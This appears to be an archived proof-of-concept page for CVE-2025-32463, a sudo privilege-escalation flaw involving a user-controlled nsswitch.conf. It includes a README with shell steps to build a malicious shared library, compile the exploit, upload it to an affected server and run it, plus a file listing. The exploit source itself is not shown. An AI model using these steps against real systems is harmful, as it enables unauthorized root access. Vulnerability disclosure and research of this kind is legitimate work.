Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-32463 PoC — Sudo 安全漏洞

Source
Associated Vulnerability
Title:Sudo 安全漏洞 (CVE-2025-32463)
Description:Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。 Sudo 1.9.17p1之前版本存在安全漏洞,该漏洞源于使用用户控制目录中的/etc/nsswitch.conf可能导致获取root访问权限。
Readme
# CVE-2025-32463
[NVD CVE-2025-32463](https://nvd.nist.gov/vuln/detail/cve-2025-32463)  
In most cases, **GCC is not installed by default** on target servers.  
This proof of concept provides a precompiled version to ensure it can be executed immediately on affected systems.

---

# Usage

## 1. Compile the `woot1337.c` file:
```bash
gcc -shared -fPIC -Wl,-init,woot -o libwoot1337.so woot1337.c
```
## 2. Convert the .so file into a C array (byte format):
```bash
xxd -i libwoot1337.so > libwoot1337.h
```
## 3. Compile the cve_2025_32463.c file:
```bash
gcc cve_2025_32463.c -o cve_2025_32463
```
## 4. Upload to the affected server and grant execution permissions:
```bash
chmod +x cve_2025_32463
./cve_2025_32463
```
# Disclaimer

This Proof of Concept (PoC) is provided solely for educational and research purposes.
Executing this code on any system without explicit authorization is illegal and unethical.
The authors disclaim any responsibility for misuse or damage caused by the use of this material.
File Snapshot

[4.0K] /data/pocs/8d1c0acb9bb4e5a229e3375aa9e40a5a5e4e50be ├── [ 32K] cve_2025_32463 ├── [1.1K] cve_2025_32463.c ├── [6.9K] LICENSE ├── [1011] README.md └── [ 193] woot1337.c 0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.